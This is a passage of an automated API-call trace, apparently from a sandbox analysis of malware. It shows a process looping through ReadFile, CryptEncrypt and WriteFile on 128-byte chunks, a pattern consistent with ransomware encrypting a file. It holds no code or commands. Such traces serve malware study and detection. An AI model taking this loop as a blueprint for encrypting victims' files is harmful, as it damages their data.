pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.239] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.240] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.240] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.240] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.240] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.240] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.240] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.240] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.240] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.240] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.240] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.240] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.240] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.240] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.240] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.240] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.240] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.240] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.240] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.240] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.240] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.240] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.240] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.240] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.241] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.241] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.241] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.241] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.241] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.241] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.241] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.241] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.241] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.241] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.241] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.241] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.241] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.241] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.278] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.278] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.279] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.279] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.279] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.279] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.279] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.279] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.279] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.279] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.279] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.279] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.279] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.279] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.279] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.279] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.279] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.279] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.280] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.280] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.280] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.280] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.280] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.280] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.280] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.280] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.280] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.280] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.280] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.280] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.280] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.280] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.280] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.280] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.280] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.280] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.280] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.280] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.281] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.281] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.281] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.281] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.281] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.281] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.281] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.281] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.281] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.281] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.281] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.281] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.281] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.281] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.281] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.281] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.281] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.281] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.281] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.281] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.281] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.281] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.282] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.282] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.282] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.282] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.282] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.282] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.282] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, 